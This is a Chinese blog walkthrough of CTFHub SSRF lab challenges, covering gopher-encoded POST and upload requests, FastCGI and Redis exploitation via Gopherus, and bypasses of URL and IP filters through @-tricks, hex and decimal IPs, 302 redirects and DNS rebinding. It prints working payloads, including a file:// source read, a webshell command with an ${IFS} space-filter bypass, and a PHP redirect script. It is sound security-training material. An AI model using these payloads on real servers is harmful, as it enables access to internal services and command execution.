CTFHub-SSRF

最新推荐文章于 2023-01-03 23:30:57 发布
最新推荐文章于 2023-01-03 23:30:57 发布
阅读量1.1k 收藏 1
点赞数
文章标签: python web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lionel_kai/article/details/120377309
版权

1.POST请求

 去访问flag.php,发现叫我们从127.0.0.1访问,

 于是构造?url=http://127.0.0.1/flag.php,发现一个key,再根据题目应该是要求我们使用post提交这个key

 这里使用gopher协议提交数据,这里采用了一个python脚本来构造gopher URL

 gopher%3A//127.0.0.1%3A80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253De34643f08867c7a25557d4f788fe75b8%250D%250A

最终payload,放到?url后面得到flag

 本题多少还是有点小迷惑,比如他说要来自127.0.0.1,我尝试使用Modheader插件去更改host然后出现的东西让我有点迷

2.上传文件

 直接访问flag.php

 于是更改payload:http://challenge-a27bafd3b1610254.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php

这里其实还有个网址:用file协议可以直接查看到源码http://challenge-a27bafd3b1610254.sandbox.ctfhub.com:10800/?url=file:///var/www/html/flag.php

 但是,发现一个问题,没有提交按钮(小问题,自己html加一个)

 <input type="submit" name="submit">

 先随便提交一个图片

 

说明还是要用gopher构造提交,这里用burp抓一下包:

把数据包里面的host改为127.0.0.1,然后复制此数据包,拿去python脚本跑一下编码

 在这里要注意一下,上传的文件最好不要是一句话木马文件,我尝试了很多次,发现如果是木马文件的话,防火墙会对数据包进行拦截,这个我有点不清楚怎么回事,所以我换了几次数据包,图片和txt都可以的

 最后贴到url上,拿到flag

 3.FastCGI协议

 利用gopher工具贴上想要执行的代码,转换成gopher语句,其中的ls /表示根目录下文件

 这里需要注意一下,这里的url语句需要再进行一次url编码(这里需要二次编码是因为GET获取参数会进行一次解码,curl也会进行一次解码)所以需要再进行一次编码。

看到有一个flag_cd5a720d5b3ac78b86be2534a833634文件,再次构造gopher语句,这里的flag文件在根目录下,所以cat的时候也要放到根目录下去打开

cat /flag_cd5a720d5b3ac78b86be2534a833634

 可以拿到flag

 4.REDIS

使用Gopherus生成所需攻击Redis的Paylaod:这里需要再进行一次url编码

 这里上传数据包后会显示504:

但实际上包已经成功发送,这里访问shell.php 输入cmd命令

 这里可以看到有一个flag文件,用cat打开,拿到flag

 这里还有一个小地方:如果url地址变成:10800/?url=127.0.0.1/shell.php?cmd=ls /

页面会显示错误,但是换成:10800/?url=127.0.0.1/shell.php?cmd=ls${IFS}/可以绕过空格

说明这个页面存在一个空格过滤的规则,后面的操作一样可以拿到flag。

而直接访问shell.php就不会有这个问题

 5.URL-BYpass

一些常见的绕过

Web安全之url跳转漏洞及bypass总结 - 卿先生 - 博客园

这里用的是@

?url=http://notfound.ctfhub.com@127.0.0.1/flag.php

 

 拿到flag(至于你问我为什么是这个文件。。。。eiduo)

 6.IP bypass

 正常访问:127.0.0.1/flag.php

很明显遭到了过滤

这里可以将127.0.0.1换一下形式,比如进制转换

0x7F000001

 2130706433

 还可以直接用0代替

 这样都是可以访问到127.0.0.1的

7.302跳转 Bypass

1.emmmm.这个题可以用上一题的方法绕过去

 2.使用短地址转换

?url=surl-2.cn/0nPI

 3.302跳转,在服务器上写一个脚本:<?php header("Location:http://127.0.0.1/flag.php")?>,然后构造url访问这个服务器上的脚本地址,出flag

8.DNS重绑定 Bypass

1.这题还是可以用绕过来做。。。。。

 2.使用dns rebind网站构造器:rbndr.us dns rebinding service

 

 一样可以拿到flag

 

Lionel_kai
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFHub-SSRF-Writeup
liuhanzhe的专栏
12-15 2789
SSRF SSRF常见利用方式总结 内网访问 直接构造访问请求,获取flag /?url=127.0.0.1/flag.php 伪协议读取文件 根据题目提示使用file://协议,尝试一般web目录/var/www/html/ 端口扫描 提示端口范围8000到9000 /?url=127.0.0.1:8000 使用burpsuite对端口进行爆破,即可得到端口,访问获取flag POST请求 访问/?url=127.0.0.1/flag.ph,返回页面 包含一个form和隐藏的key,推测需要在fo
CTFhub-ssrf-POST请求
qq_51553814的博客
08-11 3834
CTFhub-ssrf-POST请求 解题 进入靶场,首先看到的是一片空白,没有任何返回,甚至看源码里面也没有任何东西 使用dirsearch扫描,扫出了一个文件/index.php 还有一个flag.php,我是在网上看WP才知道有这个文件,看了很多篇WP都没有说这个文件怎么来的,只是直接说发现了这个文件 现在先来看一看这两个文件吧 首先是flag.php文件,我们让url=127.0.0.1/flag.php,通过内网来访问就能直接访问到了,访问后是一个方框 再看源码发现,需要用post传输一个key
BUUCTF [第二章 web进阶]SSRF Training1
sinat_41572027的博客
06-25 505
BUUCTF [第二章 web进阶]SSRF Training1 1.尝试输入正确URL,能正常跳转2.查看网页源码,发现challenge.php网页3.进入challenge.php,学习源码 4.构造payload 绕过parse_url() 5.成功绕过后,访问flag.php 获得flag 便捷方法:在url栏输入http://127.0.0.1/flag.php 即可成功访问...
ctfshow ssrf
weixin_52240463的博客
01-23 3258
ctfshow ssrf
web-ctfctf-pikachu-XSS
一个努力生活的人的博客
06-27 2359
XSS-pikachu
CTFHub技能树笔记之SSRF:POST请求、文件上传
weixin_48799157的博客
04-03 7876
知识点: 1.什么是gopher协议 1.Gopher协议是一种信息查找系统,他将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它。 2.它只支持文本,不支持图像 3.Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。 2.gopher使用结
CTFHub-SSRF---(Post请求/上传文件/FastCGI/Redis/URL/数字IP/302跳转/DNS重绑定 Bypass)
Wking
08-17 2742
SSRF相关题目实战
uptime-checks-ssrf
04-06
这是视频,介绍在那里发现的31,000美元盲SSRF的理论:该实验室只是一个模拟,它使您可以尝试使用视频中介绍的盲目数据泄露的先进技术来尝试编写利用程序的技能。 有一个公开的服务可以模拟GCP控制台的“正常运行...
开发技术-硬件-SSRF前端挡光元件设计中的若干力学问.zip
04-09
开发技术-硬件
开发技术-硬件-SSRF前端挡光元件设计中的若干力学问题研究.zip
04-09
开发技术-硬件
mars-ssrf:SSRFDedektörü
03-04
火星 SSRFDedektörü
exchange-ssrf-rce:交换服务
03-15
用法 python3 .\exchange-exp.py 使用方式: python PoC.py <target> ...[*] Getting ComputerName and DomainName [+] domain : xxx-xxxx | [+] computer : xxx.xxx-xxxx.xxx | [*] Getting LegacyDN ...
ctfhub SSRF ( skilltree
qq_66748496的博客
01-03 305
SSRF (Server-Side Request Forgery) 即服务端请求伪造,从字面意思上理解就是伪造一个服务端请求,也即是说攻击者伪造服务端的请求发起攻击,攻击者借由服务端为跳板来攻击目标系统。
CTFHub-SSRF部分(已完结)
热门推荐
feng的博客
09-14 1万+
内网访问 根据题目意思,让我们如访问内网的flag.php,因此抓包进行访问,即可得到flag: 伪协议读取文件 根据题目的意思我们需要使用URL的伪协议去读取文件,那么我们首先要了解URL的伪协议。 URL伪协议有如下这些: file:/// dict:// sftp:// ldap:// tftp:// gopher:// 具体的用法请参考SSRF中URL的伪协议 这里我们使用file伪协议从文件系统中读取文件,我们直接抓包读取: 这里其实有点考常识了,因为网站的目录一般都在/var/ww
CTFHUB-SSRF-POST请求
qq_62078839的博客
04-23 1596
打开连接 尝试读取flag.php与index.php flag.php <?php error_reporting(0); if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1") { echo "Just View From 127.0.0.1"; return; } $flag=getenv("CTFHUB"); $key = md5($flag); if (isset($_POST["key"]) && $_P...
CTFHub技能树web(持续更新)--SSRF--POST请求
jiuyongpinyin的博客
02-02 908
POST请求 这道题我没做出来,是参考了大佬的文档做得 点我查看大佬链接 有很多不解的地方,这里我就只提供我的payload把 url=gopher://127.0.0.1/_POST%252b/flag.php%252bHTTP/1.1 Host%25253a%252b127.0.0.1%25253a80 Content-Type%25253a%252bapplication/x-www-form-urlencoded Content-Length%25253a%252b36 Content-Leng
php curl ssrf,CTFHUB技能树-SSRF【POST请求】
weixin_36043142的博客
03-16 658
CTFHUB SSRF POST请求废话首先开始解题构造gopher数据构造获取flag的请求废话最近ctfhub新添加了一些题目,看到有ssrf的题目便去试了一下,前面几个都比较简单就暂时先不写,post 请求那个折腾了几天终于弄懂了,把过程记录下。 首先我们看下题目描述,这个肯定是不能错过的。*描述:发一个HTTP POST请求.ssrf是用php的curl实现的.并且会跟踪302跳转.开始解...
CTFHUB-WEB-SSRF【11】POST请求 上传文件 FastCGI协议 Redis协议
(∪.∪ )...zzz的博客
06-13 924
!!!POST请求试一下`?url=file:///var/www/html/flag.php`根据提示从127.0.0.1 访问给服务器发送一个KEY,写POST包上传文件FastCGI协议Redis协议 POST请求 试一下?url=file:///var/www/html/flag.php 根据提示从127.0.0.1 访问 给服务器发送一个KEY,写POST包 <!-- Debug: key=a977f452523073d3d7d2fd8bd41b5331--> 这个是基础po
CTFHub技能树 Web-SSRF篇(保姆级通过教程)
weixin_45808483的博客
11-10 4798
第一部分(Http、Dict和file等协议的利用) 内网访问 尝试访问位于127.0.0.1的flag.php吧 我们是从目标主机内网环境访问它本地的flag.php,我们构建url: /?url=http://127.0.0.1/flag.php 图中我们可以看出访问成功了。 为协议读取文件 尝试去读取一下Web目录下的flag.php吧 我们尝试直接访问,发现访问不到。 既然是伪协议访问,我们先了解一下url伪协议: 类型 file:/// dict..
CTFHUB SSRF文件上传
最新发布
07-28
- *1* *2* *3* [CTFHub-SSRF---(Post请求/上传文件/FastCGI/Redis/URL/数字IP/302跳转/DNS重绑定 Bypass)](https://blog.csdn.net/qq_31710331/article/details/119765578)[target="_blank" data-report-click={"spm...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值